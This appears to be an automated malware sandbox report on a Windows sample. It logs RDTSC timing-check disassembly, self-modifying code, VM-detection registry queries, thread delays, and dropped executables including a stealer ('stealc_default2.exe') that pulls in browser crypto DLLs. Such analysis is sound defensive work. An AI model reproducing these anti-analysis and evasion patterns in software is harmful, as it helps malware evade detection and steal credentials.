                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90195 second address: 4D901C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D819h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F927881D80Dh 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D901C4 second address: 4D901CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D901CA second address: 4D901CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D901CE second address: 4D90207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F9278BE2834h 0x0000000e mov dword ptr [esp], esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9278BE2837h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90207 second address: 4D9021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D814h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9021F second address: 4D90223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90223 second address: 4D9023A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F927881D80Ah 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9023A second address: 4D90240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90240 second address: 4D90244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90244 second address: 4D90248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90248 second address: 4D90275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F927881D80Eh 0x00000012 adc cx, 5808h 0x00000017 jmp 00007F927881D80Bh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90275 second address: 4D902A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9278BE282Dh 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902A4 second address: 4D902B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D80Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902B4 second address: 4D902DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9278BE2835h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902DE second address: 4D902E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902E3 second address: 4D90307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F92EB5E0B4Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9278BE2832h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90307 second address: 4D9038B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F927881D80Dh 0x0000000c sub si, 4DF6h 0x00000011 jmp 00007F927881D811h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 jmp 00007F927881D80Eh 0x00000026 je 00007F92EB21BAE7h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F927881D80Dh 0x00000035 sub ecx, 7DDFEA06h 0x0000003b jmp 00007F927881D811h 0x00000040 popfd 0x00000041 call 00007F927881D810h 0x00000046 pop eax 0x00000047 popad 0x00000048 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9038B second address: 4D903C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2830h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F9278BE2830h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F9278BE282Ah 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903C3 second address: 4D903C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903C7 second address: 4D903CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903CD second address: 4D903D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903D3 second address: 4D903D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903D7 second address: 4D903ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ecx, 553A4267h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903ED second address: 4D90487 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 9E03h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F9278BE2836h 0x0000000f and ch, FFFFFFC8h 0x00000012 jmp 00007F9278BE282Bh 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F9278BE2838h 0x0000001e sbb eax, 1238A228h 0x00000024 jmp 00007F9278BE282Bh 0x00000029 popfd 0x0000002a popad 0x0000002b popad 0x0000002c jne 00007F92EB5E0A65h 0x00000032 jmp 00007F9278BE2836h 0x00000037 test byte ptr [esi+48h], 00000001h 0x0000003b pushad 0x0000003c jmp 00007F9278BE282Eh 0x00000041 mov dl, cl 0x00000043 popad 0x00000044 jne 00007F92EB5E0A4Ch 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90487 second address: 4D9048B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9048B second address: 4D904A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80756 second address: 4D8075A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8075A second address: 4D80760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D808A1 second address: 4D8090E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov eax, 0ECFF13Bh 0x00000010 pushfd 0x00000011 jmp 00007F927881D810h 0x00000016 jmp 00007F927881D815h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f jmp 00007F927881D80Ch 0x00000024 pushad 0x00000025 mov ah, 90h 0x00000027 mov di, 1600h 0x0000002b popad 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F927881D815h 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8090E second address: 4D809DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov si, D651h 0x0000000e call 00007F9278BE282Eh 0x00000013 jmp 00007F9278BE2832h 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov esi, dword ptr [ebp+08h] 0x0000001d pushad 0x0000001e mov ch, bh 0x00000020 pushfd 0x00000021 jmp 00007F9278BE2838h 0x00000026 jmp 00007F9278BE2835h 0x0000002b popfd 0x0000002c popad 0x0000002d sub ebx, ebx 0x0000002f pushad 0x00000030 mov edi, 7A8D2F80h 0x00000035 pushfd 0x00000036 jmp 00007F9278BE2839h 0x0000003b or eax, 738EAD86h 0x00000041 jmp 00007F9278BE2831h 0x00000046 popfd 0x00000047 popad 0x00000048 test esi, esi 0x0000004a jmp 00007F9278BE282Eh 0x0000004f je 00007F92EB5E81F5h 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F9278BE2837h 0x0000005c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D809DE second address: 4D80A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F927881D80Fh 0x00000009 adc ecx, 1D73221Eh 0x0000000f jmp 00007F927881D819h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F927881D80Fh 0x00000026 add si, 4C2Eh 0x0000002b jmp 00007F927881D819h 0x00000030 popfd 0x00000031 popad 0x00000032 mov ecx, esi 0x00000034 jmp 00007F927881D80Eh 0x00000039 je 00007F92EB22314Dh 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 mov si, dx 0x00000047 popad 0x00000048 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A6B second address: 4D80AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov cl, 56h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [77816968h], 00000002h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F9278BE2832h 0x0000001b and ch, 00000038h 0x0000001e jmp 00007F9278BE282Bh 0x00000023 popfd 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80AA5 second address: 4D80ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D812h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80ABB second address: 4D80AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F92EB5E8110h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80AD8 second address: 4D80ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80ADC second address: 4D80AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80AF7 second address: 4D80AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80AFD second address: 4D80B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B01 second address: 4D80B77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F927881D80Dh 0x00000012 adc si, A096h 0x00000017 jmp 00007F927881D811h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F927881D810h 0x00000023 jmp 00007F927881D815h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F927881D818h 0x00000034 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B77 second address: 4D80B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B7B second address: 4D80B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80C9E second address: 4D80CB1 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, B11Dh 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80CB1 second address: 4D80CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80CB5 second address: 4D80CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80CB9 second address: 4D80CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90A20 second address: 4D90A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9278BE2837h 0x00000012 xor al, 0000006Eh 0x00000015 jmp 00007F9278BE2839h 0x0000001a popfd 0x0000001b movzx esi, dx 0x0000001e popad 0x0000001f mov ebx, 2BC53CD0h 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov ax, di 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90A81 second address: 4D90B11 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F927881D817h 0x00000008 and ah, 0000002Eh 0x0000000b jmp 00007F927881D819h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F927881D818h 0x0000001d and esi, 504D0DD8h 0x00000023 jmp 00007F927881D80Bh 0x00000028 popfd 0x00000029 push esi 0x0000002a mov eax, ebx 0x0000002c pop edx 0x0000002d popad 0x0000002e pop ebp 0x0000002f pushad 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F927881D80Ah 0x00000037 xor al, 00000038h 0x0000003a jmp 00007F927881D80Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 mov si, bx 0x00000046 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90B11 second address: 4D90B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90F72 second address: 4D90F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90F78 second address: 4D90F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90F7C second address: 4D90F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D816h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90F9D second address: 4D90FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90FA3 second address: 4D90FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1032D second address: 4E10332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10332 second address: 4E10376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F927881D80Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007F927881D810h 0x00000019 call 00007F927881D809h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10376 second address: 4E10393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10393 second address: 4E10399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10399 second address: 4E1039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1039D second address: 4E10421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop esi 0x00000012 popad 0x00000013 jmp 00007F927881D817h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F927881D819h 0x00000022 mov eax, dword ptr [eax] 0x00000024 pushad 0x00000025 push edi 0x00000026 jmp 00007F927881D80Ah 0x0000002b pop ecx 0x0000002c mov edx, 1B5A16C6h 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F927881D813h 0x0000003d rdtsc
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A6EC40 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A6C482 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C35543 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C12E29 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C09CBB instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C9DD2A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: CBEC40 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: CBC482 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E85543 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E62E29 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E59CBB instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: EEDD2A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeSpecial instruction interceptor: First address: ACEA88 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeSpecial instruction interceptor: First address: C7E71D instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory allocated: B40000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMemory allocated: 1A950000 memory reserve | memory write watch
                          Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exeCode function: 6_2_04E10370 rdtsc 6_2_04E10370
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1100Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1102Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1055Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 955Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1107Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1149Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1152Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 917Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow / User API: threadDelayed 372
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow / User API: threadDelayed 364
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow / User API: threadDelayed 370
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow / User API: threadDelayed 390
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow / User API: threadDelayed 369
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow / User API: threadDelayed 371
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001425001\shop.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
